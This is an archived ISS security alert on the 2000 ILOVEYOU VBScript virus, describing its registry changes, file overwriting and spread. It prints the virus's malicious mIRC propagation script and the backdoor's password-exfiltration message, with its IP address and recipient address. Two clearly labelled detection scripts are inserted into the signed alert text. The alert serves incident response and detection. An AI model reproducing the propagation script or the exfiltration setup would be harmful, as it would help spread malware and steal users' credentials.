
From xforce@iss.net Sun May 14 13:42:20 2000
From: X-Force <xforce@iss.net>
Resent-From: mea culpa <jericho@dimensional.com>
To: alert@iss.net
Resent-To: jericho@attrition.org
Date: Fri, 5 May 100 18:16:49 -0400 (EDT)
Subject: ISSalert: Internet Security Systems Security Alert


TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to
majordomo@iss.net  Contact alert-owner@iss.net for help with any problems!
---------------------------------------------------------------------------


-----BEGIN PGP SIGNED MESSAGE-----

Internet Security Systems Security Alert
May 5, 2000 -- *UPDATED*

"ILOVEYOU" Virus Affects Windows Users

Synopsis:

A dangerous Visual Basic Script (VBScript) virus, dubbed the "ILOVEYOU"
or "LoveLetter" virus, has been spreading across the Internet through
email using Microsoft Outlook and through Internet Relay Chat (IRC) via
mIRC, a popular chat client for Windows. The virus can run on any system
where the Windows Scripting Host (WSH) features are enabled.

Impact:

Mail servers may incur mild to severe overloading and could crash when
flooded with an unexpected number of the ILOVEYOU messages. The actual
VBScript code performs a number of destructive tasks:

 - Modifies and creates various Windows registry entries.

 - Launches Internet Explorer to download a backdoor program which, once
installed, captures network passwords and emails this data to an account
in the Philippines.

 - Infects the local machine by creating many new copies of itself and
overwriting data files of specific file types (including VBScript, JPEG,
and JavaScript).

 - Spreads itself to other users by using information from the Microsoft
Outlook Address Book, as well as mIRC's DCC feature, which allows chat
participants to exchange files.

Description:

Visual Basic Scripts can be executed if Windows Scripting Host (WSH) is
installed and enabled. Windows Scripting Host is installed by default
with Windows 98 and with Internet Explorer version 4.0 and later.

The original version of the virus was spread as follows:

Subject: ILOVEYOU
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs

Internet Security Systems has become aware of several other variants of
this virus as shown below. Please note that modifying the virus is
trivial and that new versions may be distributed at any time.

Subject: fwd: Joke
Attachment: Very Funny.vbs

Subject: Susitikim shi vakara kavos puodukui...
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs

Subject: Mothers Day Order Confirmation
Body: We have proceeded to charge your credit card for the amount of
$326.92 for the mothers day diamond special. We have attached a detailed
invoice to this email. Please print out the attachment and keep it in a
safe place. Thanks Again and Have a Happy Mothers Day!
mothersday@subdimension.com
Attachment: mothersday.vbs

When the attachment is opened, the malicious VBScript code launches,
performing the following operations in sequence:

 - The virus removes the timeout associated with the Windows scripting
unit by changing the value of the "HKEY_CURRENT_USER\Software\Microsoft\
Windows Scripting Host\Settings\Timeout" registry key.

 - The virus copies itself to SYSTEMDIR\MSKernel32.vbs,
WINDIR\Win32DLL.vbs, and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs.

 - The following registry entries are created under HKEY_LOCAL_MACHINE,
such that the MSKernel32.vbs and Win32DLL.vbs copies will be launched at
boot-time:

  \Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
  \Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

  Win32DLL.vbs is created as a service.

 - An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for later use
(in the mIRC script) and placed in the Windows SYSTEMDIR. Typically,
WINDIR is C:\WINDOWS and SYSTEMDIR is C:\WINDOWS\SYSTEM.

 - The virus attempts to spread itself via e-mail using Microsoft
Outlook. It sends a message to all addresses found in every address
book. Each individual is flagged in the registry after they have been
sent a copy.
 
For each address list that is found, a counter is kept in the registry
to track the number of users that have been mailed. The number of email
addresses in the address list is also recorded. If the number of
addresses in the list increases, the virus will enumerate the
individuals again and send out the "ILOVEYOU" mail to those who have not
previously received it.

All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB.

 - The virus uses Internet Explorer to connect to one of four HTTP web
locations in an attempt to download a backdoor program called
WIN-BUGSFIX.EXE. This backdoor program captures any network passwords it
identifies and automatically emails this information to a mail account
in the Philippines, presumably controlled by the author of the virus.

The original download locations for the WIN-BUGSFIX.EXE file seem to be
invalid. Be aware that modified versions of the virus may point to
valid copies of the backdoor, so this is still a threat.

Before Internet Explorer is launched, the following registry entry,
which sets the Internet Explorer start page, is changed to one of four
URLs at random:

  \Software\Microsoft\Internet Explorer\Main\Start Page

After the executable is downloaded, the start page value is set to
"about:blank".

The Mother's Day variation of the virus does not attempt to install the
backdoor, but does modify the Internet Explorer start page.

 - The following registry entry is created (under HKEY_LOCAL_MACHINE) to
launch WIN-BUGSFIX.EXE at boot-time:

  \Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE

 - The virus identifies any local or network drives connected to
the system and recursively visits each folder, overwriting files of any
of the following extensions with a copy of itself, changing the
extension to ".vbs" and deleting the original file:

  vbs - Visual Basic Script
  vbe - Visual Basic Script (Encoded)
  js  - JavaScript
  jse - JavaScript (Encoded)
  css - Cascading Style Sheets
  wsh - Windows Scripting Host
  sct - Scriptlet file
  hta - HTML Application

The virus deletes any ".jpg" and ".jpeg" compressed image files and
replaces each with a copy of itself, named after the original file with
".vbs" appended. The Mother's Day variation of the virus removes files of
type ".ini" (Windows script files) and ".bat" (DOS batch files) instead
of ".jpg" and ".jpeg".

Original copies of any MP3 or MP2 audio files found are preserved, but a
copy of the virus is created using the same file name with ".vbs"
appended. The original MP2/MP3 file's attributes will be changed so the
file is hidden.
  
 - If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini",
"script.ini", or "mirc.hlp" are found, a new default initialization
script named "script.ini" is created in the same directory:

  [script]
  ;mIRC Script
  ;  Please dont edit this script... mIRC will corrupt, if mIRC will
  ;  corrupt... WINDOWS will affect and will not run correctly. thanks
  ;
  ;Khaled Mardam-Bey
  ;http://www.mirc.com
  ;
  n0=on 1:JOIN:#:{
  n1=  /if ( $nick == $me ) { halt }
  n2=  /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
  n3=}

This script will attempt to send a copy of the pre-generated HTML page
to any user who is seen joining any channel you are in on IRC.
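The following Python script is an added example, not part of the ISS alert and not ISS code. It checks the host indicators described in the steps above offline: the registry values the virus writes (read from a regedit .reg export) and the file-name patterns it leaves behind. Key and value names are taken from the alert; treating MSKernel32, Win32DLL and WIN-BUGSFIX.EXE as value names under the Run/RunServices keys, the Timeout value of 0, the .reg text and the path list are all constructed assumptions (the alert says only that the Timeout value is changed).

```python
"""Offline triage for the ILOVEYOU host indicators (added example, not ISS code).
The .reg export and path list are constructed; Timeout=0 is assumed."""
import re

# (key, value name, meaning) for the values the alert says the virus writes.
REG_INDICATORS = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings",
     "Timeout", "WSH script timeout changed"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
     "MSKernel32", "boot-time launch of MSKernel32.vbs"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
     "Win32DLL", "boot-time launch of Win32DLL.vbs"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
     "WIN-BUGSFIX.EXE", "boot-time launch of the WIN-BUGSFIX.EXE backdoor"),
]
WAB_FLAG_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\WAB"  # "already mailed" flags
DROPPED_FILES = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs",
                 "love-letter-for-you.htm", "win-bugsfix.exe"}
# Originals of these types are deleted after NAME.EXT.vbs is written ...
DELETED_ORIGINAL = {"jpg", "jpeg", "ini", "bat"}   # ini/bat: Mother's Day variant
# ... while these originals stay on disk, only marked hidden.
HIDDEN_ORIGINAL = {"mp3", "mp2"}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg_export(text):
    """Parse a .reg export into {(key, value_name): raw_data}.
    Keys and names are lower-cased because the registry is case-insensitive."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = _KEY_RE.match(line)
        if m:
            key = m.group(1).lower()
            continue
        m = _VAL_RE.match(line)
        if m and key is not None:
            values[(key, m.group(1).lower())] = m.group(2)
    return values


def registry_findings(values):
    """Describe every listed indicator value present in the parsed export."""
    findings = []
    for key, name, note in REG_INDICATORS:
        raw = values.get((key.lower(), name.lower()))
        if raw is not None:
            findings.append(f"{key}\\{name} = {raw} ({note})")
    wab = WAB_FLAG_KEY.lower()
    mailed = [n for (k, n) in values if k == wab or k.startswith(wab + "\\")]
    if mailed:
        findings.append(f"{len(mailed)} address flag(s) under {WAB_FLAG_KEY}: "
                        "these recipients were already sent the virus")
    return findings


def file_findings(paths):
    """Map each suspicious path to what the alert says happened to the original."""
    findings = {}
    for p in paths:
        name = p.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name in DROPPED_FILES:
            findings[p] = "dropped virus component"
        elif name.endswith(".vbs"):
            stem = name[:-4]                                   # e.g. "holiday.jpg"
            ext = stem.rsplit(".", 1)[-1] if "." in stem else ""
            if ext in DELETED_ORIGINAL:
                findings[p] = f"virus copy; original .{ext} file was deleted"
            elif ext in HIDDEN_ORIGINAL:
                findings[p] = f"virus copy; original .{ext} file is hidden, recoverable"
    return findings


# Constructed sample export (not a real capture).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings]
"Timeout"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MSKernel32"="C:\\WINDOWS\\SYSTEM\\MSKernel32.vbs"
"WIN-BUGSFIX.EXE"="C:\\WINDOWS\\SYSTEM\\WIN-BUGSFIX.EXE"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Win32DLL"="C:\\WINDOWS\\Win32DLL.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\WAB]
"alice@example.com"="1"
"bob@example.com"="1"
"""

# Constructed sample directory listing.
SAMPLE_PATHS = [
    r"C:\WINDOWS\SYSTEM\MSKernel32.vbs",
    r"C:\WINDOWS\Win32DLL.vbs",
    r"C:\My Documents\holiday.jpg.vbs",
    r"C:\My Documents\song.mp3.vbs",
    r"C:\My Documents\song.mp3",
    r"C:\My Documents\report.doc",
]

if __name__ == "__main__":
    for f in registry_findings(parse_reg_export(SAMPLE_REG)):
        print("REG :", f)
    for p, what in file_findings(SAMPLE_PATHS).items():
        print("FILE:", p, "->", what)
```

The name-based check cannot recognise a script file that the virus overwrote in place: a .js, .css or .hta original becomes NAME.vbs with no trace of the old extension, so those have to be compared against backups. For .mp2/.mp3 files the original is still on disk and recovery is just clearing the hidden attribute; for .jpg/.jpeg (and .ini/.bat in the Mother's Day variant) the original is gone. The mIRC script.ini can only be identified by its contents (the DCC send line shown above), which this listing-based check does not read.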

Recommendations:

Everyone should obtain and install the latest virus definition files for
their virus scanning software. Mail administrators should filter out any
email that has a .VBS attachment, or at least any mail with a subject
line of "ILOVEYOU".

ISS' SAFEsuite intrusion detection and response system, RealSecure, can
be configured to detect the ILOVEYOU virus by creating a new User Defined
Event. Set the priority to HIGH and the context to Email_Content. Set the
search string to "kindly check the attached LOVELETTER coming from me".
Select the RSKILL action, plus any additional action you would like.
This should stop any incoming email containing the virus from being
delivered to an SMTP server. RealSecure can also be modified to detect
and kill the ILOVEYOU virus destined for a POP server. In addition to the
steps above, the policy file template must be modified using a text
editor: in the SMTP field of the \template\protocol section, add the POP
ports to the SMTP definitions. This section is shown below:

[\template\protocols\];
http	=S	80;
ftp	=S	21;
smtp	=S	25, 109-110;
pop	=S	109-110;
imap	=S	143 220;
nntp	=S	119;
[\template\userdefinedsignatures\];
Repeat for each variant of the virus as described above.

Windows Scripting Host can be disabled in Windows 98 as follows: From
the Control Panel, double-click "Add/Remove Programs". Click the
"Windows Setup" tab and double-click on "Accessories". Scroll down if
necessary and uncheck the box beside "Windows Scripting Host". Click
"OK" and the Accessories dialog box will disappear. Now click the
"Apply" button from the Add/Remove Programs Properties. Windows will
now uninstall Windows Scripting Host from the system.

The WIN-BUGSFIX.EXE program attempts to connect to port 25 of IP
address 199.108.232.1 to deliver the captured passwords. The message
that is sent is as follows:

To: mailme@super.net.ph
Subject: Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.trojan---by: spyder

Host: kakker
Username: Default
IP Address: 10.67.101.123

RAS Passwords:

Cache Passwords:

BLABLA\MPM : xxx
BJORN\MUSIC : xxx
TOM\SHARED : xxx
TOM2\MP3 : xxx
www.server.com/ : xxx:xxx
MAPI : MAPI

The "xxx" entries represent the plaintext usernames and passwords
captured by the WIN-BUGSFIX.EXE program.
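As an added example (not part of the ISS alert, and not RealSecure or any ISS code), the Python script below implements the mail-gateway filtering suggested in the Recommendations and also matches the outbound Barok password message that WIN-BUGSFIX.EXE sends. It uses only the standard-library `email` package; the sample messages are constructed from the subject lines, body text, attachment names and headers quoted in this alert, and the attachment body is a placeholder.

```python
"""Mail-gateway check for ILOVEYOU variants and the WIN-BUGSFIX.EXE (Barok)
password message.  Added example, not ISS code; samples are constructed."""
import email
from email import policy

# Subject lines of the variants listed in the alert, compared case-insensitively.
KNOWN_SUBJECTS = {
    "iloveyou",
    "fwd: joke",
    "susitikim shi vakara kavos puodukui...",
    "mothers day order confirmation",
}
# Body text shared by the original and the "Susitikim" variant.
KNOWN_BODY = "kindly check the attached loveletter coming from me"
# Markers of the outbound password message emitted by WIN-BUGSFIX.EXE.
BAROK_MARKER = "barok... email.passwords.sender.trojan"
BAROK_RECIPIENT = "mailme@super.net.ph"


def _text_body(msg):
    """First text part of the message as a string, or '' if there is none."""
    body = msg.get_body(preferencelist=("plain", "html"))
    return body.get_content() if body is not None else ""


def classify_message(raw):
    """Return the list of rules a raw RFC 822 message (bytes) triggers; [] if clean."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    reasons = []
    subject = (msg.get("Subject") or "").strip().lower()

    # Inbound rule 1: any attachment whose name ends in .vbs.  This catches the
    # double extension LOVE-LETTER-FOR-YOU.TXT.vbs and survives the trivial
    # subject/body edits the alert warns about.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(".vbs"):
            reasons.append(f"vbs attachment: {name}")
    # Inbound rules 2 and 3: the subject lines and body text the alert lists.
    if subject in KNOWN_SUBJECTS:
        reasons.append(f"known subject: {subject}")
    if KNOWN_BODY in _text_body(msg).lower():
        reasons.append("known body text")

    # Outbound rule: the Barok message WIN-BUGSFIX.EXE relays to the Philippines
    # account (the alert shows it sent to 199.108.232.1 port 25).
    x_mailer = (msg.get("X-Mailer") or "").lower()
    if BAROK_MARKER in subject or BAROK_MARKER in x_mailer:
        reasons.append("Barok password-sender message")
    if BAROK_RECIPIENT in (msg.get("To") or "").lower():
        reasons.append(f"recipient {BAROK_RECIPIENT}")
    return reasons


# Constructed samples (not real captures).
SAMPLE_LOVELETTER = b"""\
From: colleague@example.com
To: you@example.com
Subject: ILOVEYOU
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="bnd"

--bnd
Content-Type: text/plain

kindly check the attached LOVELETTER coming from me.
--bnd
Content-Type: application/octet-stream; name="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Disposition: attachment; filename="LOVE-LETTER-FOR-YOU.TXT.vbs"

' placeholder attachment body, not the virus
--bnd--
"""

SAMPLE_BAROK = b"""\
To: mailme@super.net.ph
Subject: Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.trojan---by: spyder

Host: kakker
Username: Default

Cache Passwords:

BLABLA\\MPM : xxx
MAPI : MAPI
"""

SAMPLE_BENIGN = b"""\
From: colleague@example.com
To: you@example.com
Subject: Lunch on Friday?

Are we still on for noon?
"""

if __name__ == "__main__":
    for label, raw in (("loveletter", SAMPLE_LOVELETTER),
                       ("barok", SAMPLE_BAROK), ("benign", SAMPLE_BENIGN)):
        print(label, "->", classify_message(raw) or "clean")
```

The attachment-extension rule is the one worth relying on: the alert notes that modifying the virus is trivial, so the subject and body strings only catch the variants known at the time of writing, while any .vbs attachment is worth holding regardless of wording. The outbound rules belong on the relay that internal hosts use for SMTP, where a Barok message indicates a machine that already ran the backdoor.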

Trend Micro's instructions for removing the virus from your system can
be found at
http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER

Additional Information:

For more information on the ILOVEYOU virus, visit the following web
sites:

http://europe.datafellows.com/v-descs/love.htm
http://vil.mcafee.com/dispVirus.asp?virus_k=98617
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-05-01&msg=20000504121550.B20905@securityfocus.com
http://www.sarc.com/avcenter/venc/data/vbs.loveletter.a.html

_______

About Internet Security Systems (ISS) 
Internet Security Systems (ISS) is a leading global provider of security
management solutions for the Internet. By providing industry-leading
SAFEsuite security software, remote managed security services, and
strategic consulting and education offerings, ISS is a trusted security
provider to its customers, protecting digital assets and ensuring safe
and uninterrupted e-business. ISS' security management solutions protect
more than 5,500 customers worldwide including 21 of the 25 largest U.S.
commercial banks, 10 of the largest telecommunications companies and
over 35 government agencies. Founded in 1994, ISS is headquartered in
Atlanta, GA, with additional offices throughout North America and
international operations in Asia, Australia, Europe, Latin America and
the Middle East. For more information, visit the Internet Security
Systems web site at www.iss.net or call 888-901-7477.

Copyright (c) 2000 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of the X-Force. If you wish to reprint the whole or any part of
this Alert in any other medium excluding electronic medium, please
e-mail xforce@iss.net for permission.

Disclaimer

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php as well
as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force
xforce@iss.net of Internet Security Systems, Inc.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBORMoMTRfJiV99eG9AQH4uQP9FJlj+quxhqRM8NdV5TX7OFlOjoxs+yA3
EvtueaGc7dnI08EUgiUCUERjpYCtI8CnL2Gw4kETkmk6wWeHEaig4c1QkBMtjoOs
dB4iDKv+NjutECNH3SS71n7D6wkJlNUSk/rJ+WHyHhlwmDH2B09qNn6wRYUbjFtJ
TLzqCqcKos0=
=kZmQ
-----END PGP SIGNATURE-----
